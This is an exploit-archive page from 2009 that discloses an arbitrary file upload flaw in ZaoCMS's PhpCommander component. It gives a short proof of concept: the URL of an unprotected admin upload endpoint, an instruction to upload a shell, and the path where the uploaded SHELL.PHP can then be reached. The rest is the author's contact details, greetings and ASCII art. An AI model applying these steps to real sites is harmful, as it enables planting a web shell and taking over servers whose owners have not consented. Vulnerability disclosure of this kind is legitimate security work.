[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ZaoCMS (PhpCommander) Arbitary Remote File Upload Vulnerability
# Published : 2009-05-22
# Author : Qabandi
# Previous Title : ZaoCMS (user_updated.php) Remote Change Password Exploit
# Next Title : Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_w_,
( : / (_) / ( .
=By: Qabandi
=Email: iqa[a]hotmail.fr
From Kuwait PEACE
=Vuln: ZaoCMS (PhpCommander) - Arbitrary File Upload
=INFO: http://zaocms.com/
=BUY: http://zaocms.com/
=DORK: --
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-File-Upload-PoC-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Go to:
http://localhost/admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=upload
Upload shell
location:
http://localhost/documents/SHELL.PHP
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-==-=-3la-ra7atkum-shabab-=-:P=-=-=-==-=-==-=-=-=-=-=-=-=-
=-=-=-=-==-=-=-=-=-=-No--More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, Ghost-r00t, All muslim hackers.
Special Thanks: ThE g0bL!N
# www.Syue.com [2009-05-22]